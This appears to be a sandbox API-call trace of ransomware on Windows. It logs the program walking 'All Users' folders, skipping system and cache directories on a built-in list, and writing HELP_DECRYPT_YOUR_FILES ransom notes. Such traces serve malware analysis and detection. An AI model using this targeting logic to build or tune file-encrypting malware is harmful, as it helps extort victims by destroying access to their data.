	[0177.939] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="cache") returned 0x0
	[0177.939] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.939] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="temporary internet files") returned 0x0
	[0177.939] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.939] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="webcache") returned 0x0
	[0177.940] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.940] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="inetcache") returned 0x0
	[0177.940] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.940] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="nvidia") returned 0x0
	[0177.940] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.940] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="packages") returned 0x0
	[0177.941] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.941] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="cookies") returned 0x0
	[0177.941] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.941] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\*.*", lpSrch="programdata") returned 0x0
	[0177.941] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0177.941] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0177.941] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x506a2e14, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0xfd4aa69b, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x8394b6ae, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0177.942] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0177.942] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8394b6ae, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8394b6ae, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x83971baf, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0177.942] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8394b6ae, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8394b6ae, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8394b6ae, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0177.942] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x53a17a4e, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x53a17a4e, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x53abb353, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x1a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.DATABASECOMPARE.16.1033.hxn", cAlternateFileName="MSDATA~1.HXN")) returned 1
	[0177.942] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x54cb123d, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x54cb123d, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x54d3ec39, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.EXCEL.16.1033.hxn", cAlternateFileName="MSEXCE~1.HXN")) returned 1
	[0177.942] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x5c587e17, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x5c587e17, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x5cee92c4, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.GRAPH.16.1033.hxn", cAlternateFileName="MSGRAP~1.HXN")) returned 1
	[0177.942] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x572bb221, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x572bb221, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x5732d888, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x164, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.GROOVE.16.1033.hxn", cAlternateFileName="MSGROO~1.HXN")) returned 1
	[0177.942] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x58fe9daa, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x58fe9daa, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x5943467f, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.LYNC.16.1033.hxn", cAlternateFileName="MSLYNC~1.HXN")) returned 1
	[0177.943] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x58ff391c, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x58ff391c, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x594409e2, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.LYNC_BASIC.16.1033.hxn", cAlternateFileName="MSLYNC~3.HXN")) returned 1
	[0177.943] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x58feea63, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x58feea63, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x5943a85a, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.LYNC_ONLINE.16.1033.hxn", cAlternateFileName="MSLYNC~2.HXN")) returned 1
	[0177.943] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x50b37f08, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x50b37f08, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x50bcbaa5, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.MSACCESS.16.1033.hxn", cAlternateFileName="MSMSAC~1.HXN")) returned 1
	[0177.943] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x5c595587, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x5c595587, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x5cef69b7, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.MSOUC.16.1033.hxn", cAlternateFileName="MSMSOU~1.HXN")) returned 1
	[0177.943] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x63cb40e0, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x63cb40e0, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x63d40755, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.MSPUB.16.1033.hxn", cAlternateFileName="MSMSPU~1.HXN")) returned 1
	[0177.943] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x523b1e39, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x523b1e39, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x52451c7e, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.ONENOTE.16.1033.hxn", cAlternateFileName="MSONEN~1.HXN")) returned 1
	[0177.943] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x60f38a13, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x60f38a13, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x6137f8c6, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.OUTLOOK.16.1033.hxn", cAlternateFileName="MSOUTL~1.HXN")) returned 1
	[0177.943] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x627ceff1, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x627ceff1, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x628617bd, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.POWERPNT.16.1033.hxn", cAlternateFileName="MSPOWE~1.HXN")) returned 1
	[0177.943] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x5c58e036, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x5c58e036, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x5cef0812, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.SETLANG.16.1033.hxn", cAlternateFileName="MSSETL~1.HXN")) returned 1
	[0177.943] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x58ff9ac9, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x58ff9ac9, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x594457dd, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.SKYPEFB.16.1033.hxn", cAlternateFileName="MSSKYP~1.HXN")) returned 1
	[0177.943] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x59004aaf, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x59004aaf, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x59452ec7, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.SKYPEFB_BASIC.16.1033.hxn", cAlternateFileName="MSSKYP~3.HXN")) returned 1
	[0177.943] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x58ffe82d, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x58ffe82d, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x5944cd17, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.SKYPEFB_ONLINE.16.1033.hxn", cAlternateFileName="MSSKYP~2.HXN")) returned 1
	[0177.943] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x590098bc, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x590098bc, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x594aad1a, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x19a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.SKYPEFB_ONLINEG.16.1033.hxn", cAlternateFileName="MSSKYP~4.HXN")) returned 1
	[0177.944] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x53a1eec1, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x53a1eec1, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x53ac149f, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x1b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.SPREADSHEETCOMPARE.16.1033.hxn", cAlternateFileName="MSSPRE~1.HXN")) returned 1
	[0177.944] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x6501dec7, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x6501dec7, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x650b07ef, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.WINWORD.16.1033.hxn", cAlternateFileName="MSWINW~1.HXN")) returned 1
	[0177.944] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x50b35838, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x50b35838, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x650b07ef, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x1876, dwReserved0=0x0, dwReserved1=0x0, cFileName="nslist.hxl", cAlternateFileName="")) returned 1
	[0177.944] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x50b35838, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x50b35838, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x650b07ef, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x1876, dwReserved0=0x0, dwReserved1=0x0, cFileName="nslist.hxl", cAlternateFileName="")) returned 0
	[0177.944] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0177.944] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0177.945] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87b95643, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft OneDrive", cAlternateFileName="MICROS~2")) returned 1
	[0177.945] lstrcmpW (lpString1="Microsoft OneDrive", lpString2="..") returned 1
	[0177.945] lstrcmpW (lpString1="Microsoft OneDrive", lpString2=".") returned 1
	[0177.945] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users"
	[0177.945] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\"
	[0177.945] lstrcatW (in: lpString1="C:\\Users\\All Users\\", lpString2="Microsoft OneDrive" | out: lpString1="C:\\Users\\All Users\\Microsoft OneDrive") returned="C:\\Users\\All Users\\Microsoft OneDrive"
	[0177.945] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\Microsoft OneDrive" | out: lpString1="C:\\Users\\All Users\\Microsoft OneDrive") returned="C:\\Users\\All Users\\Microsoft OneDrive"
	[0177.945] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft OneDrive", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft OneDrive\\") returned="C:\\Users\\All Users\\Microsoft OneDrive\\"
	[0177.946] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\All Users\\Microsoft OneDrive\\" | out: lpString1="C:\\Users\\All Users\\Microsoft OneDrive\\") returned="C:\\Users\\All Users\\Microsoft OneDrive\\"
	[0177.946] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft OneDrive\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft OneDrive\\*.*") returned="C:\\Users\\All Users\\Microsoft OneDrive\\*.*"
	[0177.946] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft OneDrive\\*.*" (normalized: "c:\\users\\all users\\microsoft onedrive\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87b95643, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0177.954] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft OneDrive\\*.*") returned 41
	[0177.954] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.954] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft OneDrive\\*.*", cchLength=0x29 | out: lpsz="c:\\users\\all users\\microsoft onedrive\\*.*") returned 0x29
	[0177.954] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.954] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="windows") returned 0x0
	[0177.954] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.955] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="boot") returned 0x0
	[0177.955] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.955] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="system volume information") returned 0x0
	[0177.955] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.955] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0177.955] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.955] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="temp") returned 0x0
	[0177.956] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.956] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="program files") returned 0x0
	[0177.956] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.956] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="program files (x86)") returned 0x0
	[0177.956] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.956] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="appdata") returned 0x0
	[0177.956] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.956] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="application data") returned 0x0
	[0177.957] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.957] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="winnt") returned 0x0
	[0177.957] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.957] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="tmp") returned 0x0
	[0177.957] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.957] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="cache") returned 0x0
	[0177.957] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.957] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="temporary internet files") returned 0x0
	[0177.958] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.958] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="webcache") returned 0x0
	[0177.958] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.958] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="inetcache") returned 0x0
	[0177.958] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.958] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="nvidia") returned 0x0
	[0177.958] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.958] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="packages") returned 0x0
	[0177.959] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.959] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="cookies") returned 0x0
	[0177.959] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.959] StrStrW (lpFirst="c:\\users\\all users\\microsoft onedrive\\*.*", lpSrch="programdata") returned 0x0
	[0177.959] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87b95643, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0177.959] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87b95643, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup", cAlternateFileName="")) returned 1
	[0177.959] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87b95643, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup", cAlternateFileName="")) returned 0
	[0177.959] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0177.960] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0177.960] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\Microsoft OneDrive" | out: lpString1="C:\\Users\\All Users\\Microsoft OneDrive") returned="C:\\Users\\All Users\\Microsoft OneDrive"
	[0177.960] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft OneDrive", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft OneDrive\\*.*") returned="C:\\Users\\All Users\\Microsoft OneDrive\\*.*"
	[0177.960] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.960] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.960] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft OneDrive\\HELP_DECRYPT_YOUR_FILES.TXT") returned 65
	[0177.961] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft OneDrive\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft onedrive\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
